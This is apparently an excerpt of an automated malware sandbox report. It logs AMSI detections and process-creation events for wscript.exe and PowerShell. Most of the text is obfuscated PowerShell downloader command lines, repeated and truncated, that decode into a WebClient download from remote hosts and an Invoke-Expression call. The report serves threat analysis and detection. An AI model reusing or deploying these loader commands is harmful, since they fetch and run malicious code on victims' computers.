Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nicodemite $Skadefries $Mismatching), (confederalist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:tery = [AppDomain]::CurrentDomain.GetAssemblies()$glob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Aguardiente)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Administrationsgrundlagenes, $false).DefineTy
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Hovedstrukturernes)$global:Lvhytterne = [System.Text.Encoding]::ASCII.GetString($Abjudicate)$global:Skikkelsens=$Lvhytterne.substring(314784,26302)<#Vigtigpraasen Manipulationssproge
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte 